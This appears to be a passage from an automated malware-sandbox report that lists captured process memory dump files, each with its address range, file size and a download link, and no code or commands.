memory/2240-814-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-834-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-833-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-836-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-820-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-817-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-818-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-819-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-815-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-816-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-835-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-837-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-839-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-838-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-862-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-863-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/2240-873-0x00007FF79F690000-0x00007FF7A4709000-memory.dmp

Filesize
80.5MB

Download
memory/3020-539-0x0000000000110000-0x0000000000118000-memory.dmp

Filesize
32KB

Download
memory/3372-247-0x00007FF62EB40000-0x00007FF62F0D6000-memory.dmp

Filesize
5.6MB

Download
memory/3372-249-0x00007FF62EB40000-0x00007FF62F0D6000-memory.dmp

Filesize
5.6MB

Download
memory/4664-602-0x0000000000240000-0x0000000000248000-memory.dmp

Filesize
32KB

Download
memory/4800-894-0x0000000009EB0000-0x0000000009EC0000-memory.dmp

Filesize
64KB

Download
memory/4800-878-0x0000000005DA0000-0x0000000005DF8000-memory.dmp

Filesize
352KB

Download
memory/4800-892-0x0000000009ED0000-0x0000000009EE0000-memory.dmp

Filesize
64KB

Download
memory/4800-891-0x0000000009ED0000-0x0000000009EE0000-memory.dmp

Filesize
64KB

Download
memory/4800-890-0x0000000009ED0000-0x0000000009EE0000-memory.dmp

Filesize
64KB

Download
memory/4800-889-0x0000000009ED0000-0x0000000009EE0000-memory.dmp

Filesize
64KB

Download
memory/4800-893-0x0000000009EA0000-0x0000000009EB0000-memory.dmp

Filesize
64KB

Download
memory/4800-895-0x0000000009EB0000-0x0000000009EC0000-memory.dmp

Filesize
64KB

Download
memory/4800-877-0x0000000005240000-0x0000000005254000-memory.dmp

Filesize
80KB

Download
memory/4800-876-0x00000000007F0000-0x00000000007FA000-memory.dmp

Filesize
40KB

Download
memory/5024-633-0x0000000001490000-0x0000000001498000-memory.dmp

Filesize
32KB

Download
memory/5024-630-0x000000001BD80000-0x000000001C24E000-memory.dmp

Filesize
4.8MB

Download
memory/5024-631-0x000000001C2F0000-0x000000001C38C000-memory.dmp

Filesize
624KB

Download
memory/5224-874-0x00007FF7AFB30000-0x00007FF7AFB43000-memory.dmp

Filesize
76KB

Download
memory/5224-779-0x00007FF7AFB30000-0x00007FF7AFB43000-memory.dmp

Filesize
76KB

Download
memory/5436-726-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-660-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-813-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-652-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-656-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-856-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-859-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-655-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-744-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-724-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-653-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-659-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-780-0x00007FF79F690000-0x00007FF7A4709000-memory.dmp

Filesize
80.5MB

Download
memory/5436-654-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-673-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-725-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-676-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-674-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5436-677-0x00007FF7CC8E0000-0x00007FF7CC8F0000-memory.dmp

Filesize
64KB

Download
memory/5708-649-0x0000000000D90000-0x0000000000D98000-memory.dmp

Filesize
32KB

Download
memory/5824-604-0x00000000006F0000-0x0000000000A24000-memory.dmp

Filesize
3.2MB

Download
memory/5888-586-0x0000000000670000-0x0000000000678000-memory.dmp

Filesize
32KB

Download
memory/5888-589-0x0000000004FD0000-0x0000000004FDA000-memory.dmp

Filesize
40KB

Download
memory/5888-587-0x00000000054C0000-0x0000000005A66000-memory.dmp

Filesize
5.6MB

Download
memory/5888-588-0x0000000005000000-0x0000000005092000-memory.dmp

Filesize
584KB

Download
memory/6008-875-0x00007FF7AFB30000-0x00007FF7AFB43000-memory.dmp

Filesize
76KB

Download